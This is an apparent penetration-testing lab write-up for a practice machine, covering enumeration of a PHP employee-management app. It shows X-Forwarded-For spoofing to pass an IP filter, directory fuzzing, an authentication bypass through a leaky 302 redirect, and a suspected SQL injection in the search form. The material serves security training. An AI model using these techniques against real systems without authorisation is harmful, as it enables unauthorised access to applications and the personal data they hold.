Web
Nmap discovered a Web server running on the port 80 of the 192.168.107.200 host.
The running service is PHP cli server 5.5 or later (PHP 7.3.33)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE]
└─$ curl -I -X OPTIONS http://$IP/
HTTP/1.1 302 Found
Host: 192.168.107.200
Date: Sun, 29 Jun 2025 12:15:24 GMT
Connection: close
X-Powered-By: PHP/7.3.33
Set-Cookie: PHPSESSID=m263rr0apovsill581q6vigu47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: login.php
Content-type: text/html; charset=UTF-8
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE]
└─$ curl -I http://$IP/
HTTP/1.1 302 Found
Host: 192.168.107.200
Date: Sun, 29 Jun 2025 12:15:27 GMT
Connection: close
X-Powered-By: PHP/7.3.33
Set-Cookie: PHPSESSID=uqae4udvnr9eg1b91hbfs1lc58; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: login.php
Content-type: text/html; charset=UTF-8/Practice/Robust/2-Enumeration/attachments/{95C781F5-DB4E-4F50-85C0-349110A1551A}.png)
Webroot
Redirected to the /login.php endpoint.
There appears to be a IP filter, only accepting 10.10.10.x
X-Forwarded-For
/Practice/Robust/2-Enumeration/attachments/{2AD71531-CDEB-457E-AFD7-EE72D989FF9D}.png)
/Practice/Robust/2-Enumeration/attachments/{F97BBF34-6DE6-4A1E-933E-1C41FB91B5E4}.png)
Creating a session handling rule to automatically append the X-Forwarded-For header with a value of 10.10.10.10
/Practice/Robust/2-Enumeration/attachments/{3E5FFEA3-A546-42D9-A6B5-211FC5C19F70}.png)
It’s a login page to a custom PHP application.
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/robust]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -H 'X-Forwarded-For: 10.10.10.10' -u http://$IP/FUZZ -ic -e .html,.txt,.php -fw 1
________________________________________________
:: Method : GET
:: URL : http://192.168.107.200/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Header : X-Forwarded-For: 10.10.10.10
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 1
________________________________________________
Home.php [Status: 302, Size: 3030, Words: 143, Lines: 59, Duration: 50ms]
Login.php [Status: 200, Size: 1770, Words: 243, Lines: 103, Duration: 23ms]
favicon.ico [Status: 200, Size: 5430, Words: 9, Lines: 21, Duration: 22ms]
home.php [Status: 302, Size: 3030, Words: 143, Lines: 59, Duration: 36ms]
login.php [Status: 200, Size: 1770, Words: 243, Lines: 103, Duration: 25ms]
:: Progress: [81912/81912] :: Job [1/1] :: 289 req/sec :: Duration: [0:02:41] :: Errors: 0 ::ffuf identified another endpoint; home.php
The interesting observation here is that the discovered endpoint responds with a 302 Found status code, yet the response body has a length of 3030 bytes. This unusually large response size for a redirect suggests that the server may be returning meaningful content before or alongside the redirect. This behavior could indicate improperly enforced access controls or misconfigured redirection logic, potentially exposing sensitive information to unauthenticated users.
/home.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/robust]
└─$ curl -i -H 'X-Forwarded-For: 10.10.10.10' http://$IP/home.php
HTTP/1.1 302 Found
Host: 192.168.107.200
Date: Sun, 29 Jun 2025 13:02:28 GMT
Connection: close
X-Powered-By: PHP/7.3.33
Set-Cookie: PHPSESSID=tng4jut4qnl8o7gl78tnu881ov; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: login.php
Content-type: text/html; charset=UTF-8
<!doctype html>
<html lang="en">
<head>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css"
integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
<script src="https://kit.fontawesome.com/214f4b7d30.js" crossorigin="anonymous"></script>
<title>Manage Employees</title>
</head>
<body>
<div class="container">
<h1>Manage Employees</h1>
<hr/>
<form method="get">
<input type="hidden" name="action" value="search"/>
<label>
First name:
<input type="text" name="first_name" value="">
</label>
<label>
Last name:
<input type="text" name="last_name" value="">
</label>
<input type="submit" value="Submit">
</form>
<table class="table table-striped">
<thead>
<tr>
<th scope="col">Id</th>
<th scope="col">First name</th>
<th scope="col">Last name</th>
<th scope="col">Birth date</th>
<th scope="col">Actions</th>
</tr>
</thead>
<tbody>
<tr><th scope="row">1</th><td>Desireef</td><td>Joubert</td><td>2007-04-01</td><td><a href="?action=update&id=1"><i class="fas fa-pencil-alt"></i></a> <a href="?action=delete&id=1"><i class="fas fa-trash"></i></a></td></tr><tr><th scope="row">2</th><td>Blythe</td><td>Weatherall</td><td>2007-05-10</td><td><a href="?action=update&id=2"><i class="fas fa-pencil-alt"></i></a> <a href="?action=delete&id=2"><i class="fas fa-trash"></i></a></td></tr><tr><th scope="row">3</th><td>Felisha</td><td>Bookman</td><td>2006-03-12</td><td><a href="?action=update&id=3"><i class="fas fa-pencil-alt"></i></a> <a href="?action=delete&id=3"><i class="fas fa-trash"></i></a></td></tr><tr><th scope="row">4</th><td>Natacha</td><td>Pua</td><td>2007-11-24</td><td><a href="?action=update&id=4"><i class="fas fa-pencil-alt"></i></a> <a href="?action=delete&id=4"><i class="fas fa-trash"></i></a></td></tr><tr><th scope="row">5</th><td>Chante</td><td>Fenske</td><td>2007-12-28</td><td><a href="?action=update&id=5"><i class="fas fa-pencil-alt"></i></a> <a href="?action=delete&id=5"><i class="fas fa-trash"></i></a></td></tr> </tbody>
</table>
<p>Number of Employees: 10</p>
<a href="?page=1">1</a> <a href="?page=2">2</a>
</div>
<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js"
integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n"
crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js"
integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo"
crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js"
integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6"
crossorigin="anonymous"></script>
</body>
</html>Despite returning a 302 Found status code with a Location: login.php header, the /home.php endpoint still serves the full HTML content of the page. This reveals sensitive application data.
This indicates that access control is only enforced through client-side redirection and not properly implemented server-side. As a result, the restriction can be trivially bypassed using tools like curl, exposing sensitive functionality without authentication.
Authentication Bypass
/Practice/Robust/2-Enumeration/attachments/{C56649E8-212A-4E3E-9F21-6FA8C8E7A9FB}.png)
/Practice/Robust/2-Enumeration/attachments/{672D98F7-2887-4C60-8F7A-0986DD30B3DC}.png)
Removing the location header
/Practice/Robust/2-Enumeration/attachments/{B95296BC-74BC-47F7-A046-F2FCA5DE1CF5}.png)
As expected, removal of the location header reveals the content of the /home.php endpoint.
/Practice/Robust/2-Enumeration/attachments/{18D4F857-392B-4DF0-AC45-88EA9A2D4DF6}.png)
Creating a Burp Suite’s match/replace rule to automatically remove the Location header.
SQLi
/Practice/Robust/2-Enumeration/attachments/{24F408FB-0AB2-4734-A1DA-EA529BCE3068}.png)
/Practice/Robust/2-Enumeration/attachments/{1BAD8CF6-A36D-464E-A792-B4C7361728F5}.png)
It would appear that the search function is vulnerable to SQL injection.